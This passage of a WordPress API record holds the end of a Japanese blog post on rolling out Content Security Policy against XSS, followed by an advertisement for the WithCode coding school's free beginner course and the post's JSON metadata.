2\u63d0\u4f9b<br>\u30fb<strong>\u6bb5\u968e\u7684\u5c0e\u5165<\/strong>\uff1aReport-Only\u30e2\u30fc\u30c9\u2192\u7de9\u3044\u30dd\u30ea\u30b7\u30fc\u2192\u6bb5\u968e\u7684\u53b3\u683c\u5316\u2192\u6700\u7d42\u30dd\u30ea\u30b7\u30fc<br>\u30fb<strong>\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0<\/strong>\uff1aGoogle Analytics\u3001\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3001iframe\u3001\u30d5\u30a9\u30f3\u30c8\u306a\u3069\u306e\u5bfe\u51e6\u6cd5<br><strong>\u30fb\u30c6\u30b9\u30c8\u30c4\u30fc\u30eb<\/strong>\uff1aChrome DevTools\u3001CSP Evaluator\u3001Report URI\u3067\u7d99\u7d9a\u7684\u306a\u76e3\u8996<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"swl-marker mark_yellow\">CSP\u306f\u3001Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5927\u5e45\u306b\u5411\u4e0a\u3055\u305b\u308b\u5f37\u529b\u306a\u30c4\u30fc\u30eb\u3067\u3059\u3002<\/span><\/strong>\u9069\u5207\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067\u3001XSS\u653b\u6483\u306a\u3069\u306e\u6df1\u523b\u306a\u8105\u5a01\u304b\u3089\u3001\u30e6\u30fc\u30b6\u30fc\u3068Web\u30b5\u30a4\u30c8\u3092\u5b88\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u307e\u305a\u306fReport-Only\u30e2\u30fc\u30c9\u3067\u73fe\u72b6\u3092\u628a\u63e1\u3057\u3001\u6bb5\u968e\u7684\u306b\u30dd\u30ea\u30b7\u30fc\u3092\u53b3\u683c\u5316\u3057\u3066\u3044\u304f\u3053\u3068\u3092\u304a\u3059\u3059\u3081\u3057\u307e\u3059\u3002\u5b9f\u88c5\u5f8c\u3082\u7d99\u7d9a\u7684\u306b\u30ec\u30dd\u30fc\u30c8\u3092\u76e3\u8996\u3057\u3001\u65b0\u3057\u3044\u8105\u5a01\u3084\u8981\u4ef6\u306b\u5fdc\u3058\u3066\u30dd\u30ea\u30b7\u30fc\u3092\u66f4\u65b0\u3057\u3066\u3044\u304d\u307e\u3057\u3087\u3046\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">WithCode\u3092\u4f53\u9a13\u3067\u304d\u308b\u521d\u7d1a\u30b3\u30fc\u30b9\u516c\u958b\u4e2d\uff01<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"600\" height=\"500\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2024\/04\/\u30d0\u30ca\u30fc_300\u00d7250_20240425.png\" alt=\"\" class=\"wp-image-2650\"\/><\/figure>\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u3054\u7d39\u4ecb\u3057\u305fContent Security Policy\u306e\u5b9f\u88c5\u6280\u8853\u306f\u3001Web\u5236\u4f5c\u306e\u5b9f\u52d9\u3067\u975e\u5e38\u306b\u91cd\u8981\u306a\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b9\u30ad\u30eb\u3067\u3059\u3002WithCode\u3067\u306f\u3001\u3053\u3046\u3057\u305f\u6700\u65b0\u6280\u8853\u3092\u542b\u3080\u5b9f\u8df5\u7684\u306aWeb\u5236\u4f5c\u30b9\u30ad\u30eb\u3092\u5b66\u3079\u308b\u74b0\u5883\u3092\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u521d\u7d1a\u30b3\u30fc\u30b9\uff08\u00a549,800\uff09\u304c\u5b8c\u5168\u7121\u6599\u306b\uff01<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u671f\u9593\uff1a<\/strong>1\u9031\u9593<\/li>\n\n\n\n<li><strong>\u5b66\u7fd2\u5185\u5bb9\uff1a<\/strong><br>\u30ed\u30fc\u30c9\u30de\u30c3\u30d7\/\u57fa\u790e\u77e5\u8b58\/\u74b0\u5883\u69cb\u7bc9\/HTML\/CSS\/LP\u30fb\u30dd\u30fc\u30c8\u30d5\u30a9\u30ea\u30aa\u4f5c\u6210<br><strong><span class=\"swl-marker mark_yellow\">\u2192 \u6b63\u3057\u3044\u5b66\u7fd2\u65b9\u6cd5\u3067\u300c\u78ba\u304b\u306a\u6210\u9577\u300d\u3092\u5b9f\u611f\u3067\u304d\u308b\u30ab\u30ea\u30ad\u30e5\u30e9\u30e0<\/span><\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u526f\u696d\u30fb\u30d5\u30ea\u30fc\u30e9\u30f3\u30b9\u304c\u4e3b\u6d41\u306b\u306a\u3063\u3066\u3044\u308b\u4eca\u3053\u305d\u3001\u81ea\u3089\u306e\u30b9\u30ad\u30eb\u3067\u7a3c\u3052\u308b\u4eba\u6750\u3092\u76ee\u6307\u3057\u3066\u307f\u307e\u305b\u3093\u304b\uff1f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u672a\u7d4c\u9a13\u3067\u3082\u5fc3\u914d\u3059\u308b\u3053\u3068\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u521d\u7d1a\u30b3\u30fc\u30b9\u3092\u53d7\u8b1b\u3055\u308c\u308b\u65b9\u306e\u5927\u591a\u6570\u306f\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0\u672a\u7d4c\u9a13\u3067\u3059\u3002\u307e\u305a\u306f\u7121\u6599\u30ab\u30a6\u30f3\u30bb\u30ea\u30f3\u30b0\u3067\u3001\u60a9\u307f\u3084\u4e0d\u5b89\u3092\u304a\u805e\u304b\u305b\u304f\u3060\u3055\u3044\uff01<\/p>\n\n\n\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button\"><a class=\"wp-block-button__link has-white-color has-text-color has-background has-link-color wp-element-button\" href=\"https:\/\/withcode.tech\/reservation\/\" style=\"background-color:#ffbf00\"><strong>\u516c\u5f0f\u30b5\u30a4\u30c8\u304b\u3089\u7121\u6599\u30ab\u30a6\u30f3\u30bb\u30ea\u30f3\u30b0\u306b\u7533\u3057\u8fbc\u3080 \u2192<\/strong><\/a><\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306f\u3001\u958b\u767a\u8005\u306b\u3068\u3063\u3066\u6700\u3082\u91cd\u8981\u306a\u8ab2\u984c\u306e\u4e00\u3064\u3067\u3059\u3002\u7279\u306bXSS\uff08Cross-Site Scripting\uff09\u653b\u6483\u306f\u3001\u500b\u4eba\u60c5\u5831\u306e\u6f0f\u6d29\u3084\u30a2\u30ab\u30a6\u30f3\u30c8\u4e57\u3063\u53d6\u308a\u306a\u3069\u3001\u6df1\u523b\u306a\u88ab\u5bb3\u3092\u3082\u305f\u3089\u3059\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002 \u672c\u8a18\u4e8b\u3067 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":13219,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"swell_btn_cv_data":"","footnotes":""},"categories":[34,358],"tags":[66,68],"class_list":["post-12348","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-programming","category-html","tag-web","tag-html"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/comments?post=12348"}],"version-history":[{"count":8,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348\/revisions"}],"predecessor-version":[{"id":13358,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/posts\/12348\/revisions\/13358"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/media\/13219"}],"wp:attachment":[{"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/media?parent=12348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/categories?post=12348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/withcode.tech\/media\/wp-json\/wp\/v2\/tags?post=12348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}